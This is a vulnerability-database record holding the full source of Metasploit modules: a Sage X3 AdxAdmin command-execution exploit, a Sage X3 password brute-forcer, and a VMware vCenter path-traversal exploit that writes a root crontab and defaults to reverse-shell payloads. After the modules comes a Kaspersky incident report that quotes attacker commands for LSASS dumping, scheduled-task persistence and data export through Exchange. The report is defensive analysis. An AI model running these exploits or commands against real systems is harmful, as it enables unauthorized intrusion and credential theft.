to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" # bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = 
\"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? 
|| returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-15T03:49:00", "description": "This module allows an attacker to perform a password guessing attack against the Sage X3 AdxAdmin service, which in turn can be used to authenticate to a local Windows account. This module implements the X3Crypt function to 'encrypt' any passwords to be used during the authentication process, given a plaintext password.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 AdxAdmin Login Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-09-02T15:57:38", "id": "MSF:AUXILIARY-SCANNER-SAGE-X3_ADXSRV_LOGIN-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/sage/x3_adxsrv_login/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/x3'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(_info = {})\n super(\n 'Name' => 'Sage X3 AdxAdmin Login Scanner',\n 'Description' => %q{\n This module allows an attacker to perform a password guessing attack against\n the Sage X3 AdxAdmin service, which in turn can be used to authenticate to\n a local Windows account.\n\n This module implements the X3Crypt function to 'encrypt' any passwords to\n be used during 
the authentication process, given a plaintext password.\n },\n 'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(1818),\n OptString.new('USERNAME', [false, 'User with which to authenticate to the AdxAdmin service', 'x3admin']),\n OptString.new('PASSWORD', [false, 'Plaintext password with which to authenticate', 's@ge2020'])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')\n end\n\n def run_host(ip)\n cred_collection = build_credential_collection(\n blank_passwords: false,\n password: datastore['PASSWORD'],\n username: datastore['USERNAME']\n )\n\n scanner = Metasploit::Framework::LoginScanner::X3.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! 
do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: fullname,\n workspace_id: myworkspace_id\n )\n\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(level: :good, ip: ip, msg: \"Success: '#{result.credential}'\")\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n next\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(level: :verror, ip: ip, msg: \"Could not connect: #{result.proof}\")\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(level: :verror, ip: ip, msg: \"Failed: '#{result.credential}'\")\n end\n\n invalidate_login(credential_data)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sage/x3_adxsrv_login.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. 
CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. 
CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n 
unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2021-12-15T10:54:49", "description": "\n\n_Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass 
automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules._\n\n_The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond._\n\n## PrintNightmare vulnerability exploitation\n\nThis summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.\n\n### Case #1\n\nShortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it.\n\nKaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious _DLL_ libraries from the spooler service. 
It should be noted that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | C:\\Windows\\System32\\spool\\drivers\\x64\\3\\nightmare.dll C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\nightmare.dll \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | In addition, the following script was found on the host. | \\cve-2021-1675-main-powershell\\cve-2021-1675-main\\cve-2021-1675.ps1 \n \nThe table below contains signs of suspicious activity that served as a starting point for the investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1210:** \nExploitation of \nRemote \nServices | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\ \n1\\nightmare.dll \nFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate spoolsv.exe \nlocally modified \nc:\\windows\\system32 \n\\spool\\drivers\\x64\\ \n3\\old\\1\\nightmare.dll \n**T1588.005:** \nObtain \nCapabilities: \nExploits | AV exact detect in \nOnAccess mode | File: \n\\cve-2021-1675-main-powershell\\cve-2021- \n1675-main\\cve-2021-1675.ps1 \nAV verdicts: \nExploit.Win64.CVE-2021-1675.c; \nUDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit \nwas detected and \nsuccessfully deleted \nby AM engine \n \n### Case #2\n\nIn another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, _spooler_ service access to suspicious _DLL_ files was observed. 
In addition, the _spooler_ service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | MDR analyst detected the creation of suspicious _DLL_ libraries using the _certutil.exe_ tool on a monitored host. \nAfter that, the _spooler_ service was added to the planned tasks. | C:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\hello.dll \nC:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\unidrv.dll\u2026 \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Next, the spooler service called the newly created _DLL_ files. \nIn addition, the attacker ran some of the created libraries using the rundll32 component. | \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows [NTLM hashes](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) to be intercepted. | \\REGISTRY\\MACHINE\\SYSTEM\\Control \nSet001\\Control\\Lsa\\MSV1_0 \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | Then the attacker re-added spooler to the planned tasks. \nAfter that, execution of various commands on the host with System privileges was observed. 
The source of this activity was _c:\\windows\\system32\\spoolsv.exe_ process | C:\\Windows\\System32\\cmd.exe /c \nnet start spooler \nC:\\Windows\\System32\\cmd.exe /c \ntimeout 600 &gt; NUL &amp;&amp; \nnet start spooler \n \nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1570: ** \nLateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloads \nsuspicious DLL (that is, \nMeterpreter payload) via \nHTTP \n**T1140:** \nDeobfuscate/Decode Files or Information | Local File Modification | Process command lines: \ncertutil -decode 1.txt \nC:\\Share\\hello4.dll | Attacker used _certutil_ \nto decode text file into PE \nbinary \n**T1003.001: \n**OS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: \nVHO:Trojan\u2011PSW.Win64.Mimikatz.gen \nTrojan-PSW.Win32.Mimikatz.gen | Attacker tried to use \nMimikatz \n**T1127.001: \n**Trusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: \nC:\\Windows\\Microsoft.NET\\Framework\\v4 \n.0.30319\\MSBuild.exe C:\\Share\\1.xml | MSBuild network activity \n**T1210: \n**Exploitation of Remote Services | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64 \n\\3\\old\\1\\hello5.dllFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe locally \nmodified \nc:\\windows\\system3 \n2\\spool\\drivers\\x6 \n4\\3\\old\\1\\hello5.dll \n**T1547.012: \n**Boot or Logon Autostart Execution: Print Processors \n**T1033: \n**System Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\WINDOWS\\System32\\spoolsv.exe \nGrandparent 
process: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe started \nwhoami with System \nintegrity level \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: \nC:\\Windows\\System32\\spoolsv.exe \nRemote TCP port: 4444/TCP | Legitimate \nspoolsv.exe made a \nconnection to default \nMeterpreter port \n(4444/TCP) \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors \n**T1059.003:** \nCommand and Scripting Interpreter: Windows Command Shell \n**T1033:** \nSystem Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\Windows\\System32\\cmd.exe \nGrandparent process: \nC:\\Windows\\System32\\spoolsv.exe | Legitimate \nspoolsv.exe started \ncmd.exe that started \nwhoami with System \nintegrity level \n \n## MuddyWater attack\n\nIn this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>).\n\nAmong other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. 
The typical structure of the URL is provided below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14152658/MDR_interesting_cases_06.png>) | First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. | \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KLWB6.vbs \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. | hxxp://185[.]117[.]73[.]52:443/getTarget \nInfo?guid=xxx-yyy-zzz&status=1 \nhxxp://185[.]117[.]73[.]52:443/getComman \nd?guid=xxx-yyy-zzz* \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14153224/MDR_interesting_cases_07.png>) | Next, execution of commands to collect information from the compromised host was observed. 
| "C:\\Windows\\System32\\cmd.exe" /c \nexplorer.exe >> \nc:\\ProgramData\\app_setting_readme.txt "C:\\Windows\\System32\\cmd.exe" /c whoami >> c:\\ProgramData\\app_setting_readme.txt \n \n**_* xxx is the company short name (identifier), yyy is the victim hostname and zzz is the username_**\n\nThe table below contains signs of suspicious activity that were the starting point for the investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1071:** \nApplication Layer Protocol | Access to malicious hosts from nonbrowsers | Target URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nCMD line: \n"C:\\Windows\\System32\\WScript.exe" C:\\Users\\USERNAME\\AppData\\Roaming\\Microsoft\\Windo \nws\\Start Menu\\Programs\\Startup\\KLWB6.vbs \nProcess: \nC:\\Windows\\system32\\wscript.exe | VBS script accessed malicious URL during execution \n**T1071:** \nApplication Layer Protocol | URL exact detect | Malicious URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nAV verdict: \nMalware | Malicious URL was successfully detected by AV \n \n## Credential Dumping from LSASS Memory\n\nIn the last case, we'd like to talk about an attack related to collecting credentials from the LSASS process memory dump (MITRE technique T1003.001). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by a System or administrative user and then used for attack development or lateral movement.\n\nMDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker's actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via an Exchange server. 
In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. | C:\\Windows\\System32\\tasklist.exe \nC:\\Windows\\System32\\findstr.exe /i sass \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. | "C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump 616 \nc:\\programdata\\cdera.bin full\n\n_## 616 is LSASS process id_ \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154017/MDR_interesting_cases_08.png>) | Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the _resource.exe_ and _twindump.dll_ files. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -pKJERKL6j4dk&@1 c:\\programdata\\m.zip -o \nc:\\windows\\cluster\n\n## _resource.exe_ and _twindump.dll_ files were created \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Subsequently, the file _resource.exe_ was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. 
| C:\\Windows\\System32\\cmd.exe /C \nC:\\Windows\\System32\\staskes.exe /create /tn Ecoh /tr \n"cmd /c C:\\Windows\\cluster\\resource.exe \nase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru \nsystem /F\n\n## staskes.exe is a renamed schtasks.exe file \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154042/MDR_interesting_cases_09.png>) | Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool. As a result, the attacker successfully obtained an LSASS dump. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -p"KJERfK#L6j4dk321\u2033 \nc:\\programdata\\E.zip -o c:\\programdata\\ \nC:\\Windows\\System32\\cmd.exe \n/C c:\\windows\\system32\\staskes.exe /create /tn Ecoh /tr \n"c:\\programdata\\InEnglish.exe g2@j5js1 0sdfs,48 \nC:\\programdata\\EnglishEDouble \nC:\\programdata\\EnglishDDouble \nC:\\programdata\\English1.dll \nC:\\programdata\\English.dmp" /sc onstart /ru system /F C:\\Windows\\System32\\cmd.exe /C c:\\windows\\system32\\staskes.exe /run /tn Ecoh \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154059/MDR_interesting_cases_10.png>) | Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. 
| C:\\Windows\\System32\\cmd.exe /C copy \nc:\\programdata\\Es.zip \nc:\\Program Files\\Microsoft\\Exchange Server\\V14\\ClientAccess\\owa\\auth\\Es.png \n \nTable below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: \nPDM:Exploit.Win32.GenericProcess command line: \n"C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump \n**616** C:\\programdata\\cdera.bin full \nParent process command line: \nC:\\Windows\\System32\\wsmprovhost.exe - \nEmbedding \nGrandparent process command line:: \nC:\\Windows\\System32\\svchost.exe -k \nDcomLaunchProcess logon type: 3 (Network logon) | Remotely executed \nprocess memory dump \nwas detected by AM \nengine \n**616** is LSASS process \nPID \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Create section (load DLL) \nExecute section (run DLL) | DLL name: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe \nProcess PID: **616** \nParent process: command line: C:\\Windows\\System32\\wininit.exe \nProcess integrity level: System | Unknown DLL was loaded and executed within lsass.exe \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: The file is Security Support \nProvider (SSP) \nFile path: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe | Unknown DLL loaded to lsass is SSP \n**T1053.005:** \nScheduled Task/Job: Scheduled Task | Create process | Process command line: \nC:\\programdata\\InEnglish.exe g2@j5js1 \n0sdfs,48 C:\\programdata\\EnglishEDouble C:\\programdata\\EnglishDDouble \n**C:\\programdata**\\English1.dll \nC:\\programdata\\English.dmp \nParent process command line: \ntaskeng.exe {7725474B-D9EA-473D-B10D- \nAC0572A0AA70} S-1-5-18:NT 
